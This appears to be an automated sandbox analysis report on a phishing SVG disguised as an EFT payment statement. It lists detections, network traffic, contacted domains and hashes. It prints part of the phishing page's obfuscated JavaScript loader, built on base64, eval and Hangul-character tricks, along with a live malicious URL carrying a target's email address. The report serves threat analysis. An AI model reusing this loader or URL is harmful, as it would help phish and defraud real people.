Edit tour

Windows Analysis Report
34209QB_EFT_Payment_Statemt25.svg

Overview

General Information

Sample name:34209QB_EFT_Payment_Statemt25.svg
Analysis ID:1648168
MD5:83f71712cfc6b15893aa00b9c653aac4
SHA1:4a2f80f14fd7c69d974f778a83b7a9b3a531c70b
SHA256:19595d0dde03b7ba477a7788e5c4d268a2cefb43178232affbd4c52d3512ef16
Infos:

Detection

Invisible JS
Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,12513863428246768996,8172362861919672290,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    0.0.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://zak9.rnltvipi.es/favicon.icoAvira URL Cloud: Label: malware
      Source: https://zak9.rnltvipi.es/ebY7FU/Avira URL Cloud: Label: malware

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: https://zak9.rnltvipi.es/ebY7FU/#Rccate@securustechnologies.comHTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 12MB later: 39MB
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: global trafficHTTP traffic detected: GET /ebY7FU/ HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zak9.rnltvipi.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zak9.rnltvipi.es/ebY7FU/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlY5d093U2EyTnEwY2JPZDA3ZE9Cb0E9PSIsInZhbHVlIjoiZFN3M2xSUEcxMlZaMHljelM4SkVLTkxucFUvczVONHJQVFhHeExtTlBWdWR2Tm9iTTE1aFFGQWRqZ0d0N3pvTHZIOHlDdElzMnpzbVI4Zm14UGxIbWRvRlZOWU5IdUJYWjB3MXRGSmYvdXRGNFBSMmNiRTlIcW5XWFMzbjFwclkiLCJtYWMiOiIwNTc3YmNhYjc3MTc2M2YzZjEyNjk3NjNmZTI0ZGE2NmE4NTY3OGE3ZDgzOGMxZTY4ZDEyM2M5NmI2MmQ2ZWZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InI5bC9FdUppOEdXQ1B3Snl4SnhHc3c9PSIsInZhbHVlIjoiVXA0Z0VuNUFXU1Bob1kwZGZxQytwakNEOE83bC9LNXJKSzZmOXhrRTA5MWR5WFVwUURyQ0NndytPcWxXakVjMHgxdXVLa0lHckdhWnJndTFEQkgveERSbkdsNjhXdUxtdEt0Wk1XV0F4bWZtdFhNVkJpQ1MrdVY3WkVrSXMvdHkiLCJtYWMiOiJjZGVkYmFmMjdiNWQ5MDM0OTMzZjRlMmRkMDgzOThmZDA4NDNhZmVhNzE3N2Q1ZTA2MjJjMWM4NzQyZGY0M2QxIiwidGFnIjoiIn0%3D
      Source: global trafficDNS traffic detected: DNS query: zak9.rnltvipi.es
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: unknownHTTP traffic detected: POST /report/v4?s=QBhUjg9l9BM6ATa6WXVc6EuFnJtIcKRSm5tVVkGFEe9oZKtNDy90lzxpyXsQ6zlpRsD9%2FMHV2A6OlXvavwJyq4NOuJNNd67Z5unsR5z58sKKQQmH%2F22z77gaVg0i HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 430Content-Type: application/reports+jsonOrigin: https://zak9.rnltvipi.esUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 15:01:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBhUjg9l9BM6ATa6WXVc6EuFnJtIcKRSm5tVVkGFEe9oZKtNDy90lzxpyXsQ6zlpRsD9%2FMHV2A6OlXvavwJyq4NOuJNNd67Z5unsR5z58sKKQQmH%2F22z77gaVg0i"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=9895&min_rtt=9889&rtt_var=3720&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2231&delivery_rate=286576&cwnd=68&unsent_bytes=0&cid=20671f882fdbba01&ts=451&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925f489e581df82f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=105014&min_rtt=104111&rtt_var=22906&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1897&delivery_rate=35782&cwnd=220&unsent_bytes=0&cid=ce2787bedcd3488a&ts=855&x=0"
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.65.232:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: classification engineClassification label: mal64.phis.winSVG@16/3@8/33
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,12513863428246768996,8172362861919672290,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,12513863428246768996,8172362861919672290,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      34209QB_EFT_Payment_Statemt25.svg2%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://zak9.rnltvipi.es/favicon.ico100%Avira URL Cloudmalware
      https://zak9.rnltvipi.es/ebY7FU/100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.194.137
        truefalse
          high
          zak9.rnltvipi.es
          104.21.65.232
          truefalse
            unknown
            www.google.com
            142.250.65.228
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://zak9.rnltvipi.es/ebY7FU/#Rccate@securustechnologies.comtrue
                unknown
                https://zak9.rnltvipi.es/favicon.icotrue
                • Avira URL Cloud: malware
                unknown
                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                  high
                  https://zak9.rnltvipi.es/ebY7FU/true
                  • Avira URL Cloud: malware
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  64.233.180.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.65.228
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  142.250.65.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.80.3
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.80.110
                  unknownUnited States
                  15169GOOGLEUSfalse
                  151.101.194.137
                  code.jquery.comUnited States
                  54113FASTLYUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  104.21.65.232
                  zak9.rnltvipi.esUnited States
                  13335CLOUDFLARENETUSfalse
                  142.251.40.138
                  unknownUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.16
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1648168
                  Start date and time:2025-03-25 16:00:48 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Sample name:34209QB_EFT_Payment_Statemt25.svg
                  Detection:MAL
                  Classification:mal64.phis.winSVG@16/3@8/33
                  Cookbook Comments:
                  • Found application associated with file extension: .svg
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.80.110, 142.250.80.3, 142.250.65.238, 64.233.180.84, 142.251.40.110, 142.251.40.138, 142.251.32.106, 142.251.35.170, 142.251.40.106, 142.251.40.202, 142.250.80.10, 142.251.40.234, 142.251.41.10, 142.250.80.106, 142.250.64.106, 142.250.72.106, 142.250.64.74, 142.250.176.202, 142.251.40.170, 142.250.80.42, 142.250.80.74
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: zak9.rnltvipi.es
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (65364)
                  Category:downloaded
                  Size (bytes):910875
                  Entropy (8bit):3.1130263442021526
                  Encrypted:false
                  SSDEEP:
                  MD5:E79D9A828D847FAA7BA00A6E42C632EF
                  SHA1:129433E47F5CC3A4FBC71E1781CC06C880287ABE
                  SHA-256:B4FF5FC9EBC11492C82F2088CD4A58512D696D559561285E47C02790CEE22C35
                  SHA-512:F8F6F5D45C664F9C4F92011CF0F96FBE6203B9B549DD3FE221F143D4E83BAFD07444A17DA5B048BABB389BA63F3DB14AAC065F0723597BFD6EF3B97B7E41F6D8
                  Malicious:false
                  Reputation:unknown
                  URL:https://zak9.rnltvipi.es/ebY7FU/
                  Preview:<script>.XGBXeHQpGY = atob("aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8=");.QMbJFfkuio = atob("bm9tYXRjaA==");.mrrRYtZWNv = atob("d3JpdGU=");.if(XGBXeHQpGY == QMbJFfkuio){.document[mrrRYtZWNv](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBBeXpIc0pHdmpDID0gewogIGdldChDaXFsT09seG5tLCBQeE5wTG5WTXJsKSB7CiAgICBjb25zdCBiQ2pkUFRZYWFGID0gWy4uLlB4TnBMblZNcmxdCiAgICAgIC5tYXAoUG92SkNCZ3BEWCA9PiArKCfvvqAnID4gUG92SkNCZ3BEWCkpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IExEamFHdU10WmQgPSBiQ2pkUFRZYWFGLnJlcGxhY2UoLy57OH0vZywgaXpmWnBEZVJ0biA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGl6ZlpwRGVSdG4sIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKExEamFHdU10WmQpOwogIH0
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.5
                  Encrypted:false
                  SSDEEP:
                  MD5:F1C9C44E663E7E62582E3F5B236C1C72
                  SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                  SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                  SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCZCsGd--W9-hEgUNNzCpMCEyusk5Ewit8A==?alt=proto
                  Preview:CgkKBw03MKkwGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65447)
                  Category:downloaded
                  Size (bytes):89501
                  Entropy (8bit):5.289893677458563
                  Encrypted:false
                  SSDEEP:
                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                  Malicious:false
                  Reputation:unknown
                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                  File type:data
                  Entropy (8bit):3.6979602934055515
                  TrID:
                  • Lumena CEL bitmap (63/63) 60.58%
                  • Corel Photo Paint (41/41) 39.42%
                  File name:34209QB_EFT_Payment_Statemt25.svg
                  File size:1'172 bytes
                  MD5:83f71712cfc6b15893aa00b9c653aac4
                  SHA1:4a2f80f14fd7c69d974f778a83b7a9b3a531c70b
                  SHA256:19595d0dde03b7ba477a7788e5c4d268a2cefb43178232affbd4c52d3512ef16
                  SHA512:7122adbd78be4f9a13b7915e760b87cb56bc3c6e734794fb1fbed3d6d73e28582c0d98e067044fb02d7e3f866807be2411ecd9ed30b317dd53fcfebacd40f405
                  SSDEEP:12:F/LX4okR+I+3AYqcTJnyNHJcRLcTCevbqQWpaKG318qAn8WRXCa12jATOFskA8g7:lLnAYH4NyRgkE31DA8kqjA2XMyXe
                  TLSH:4D21003F56DE021E75B1EB54C1F01083B965BF5B7518AD4C11EA0B0C80A2ED2B8D6B2F
                  File Content Preview:<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.8.". .s.t.a.n.d.a.l.o.n.e.=.".n.o.".?.>.....<.s.v.g. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.0./.s.v.g.". .w.i.d.t.h.=.".4.0.0.". .h.e.i.g.h.t.=.".2.5.0.".>.....<.s.c.r.i
                  Icon Hash:173149cccc490307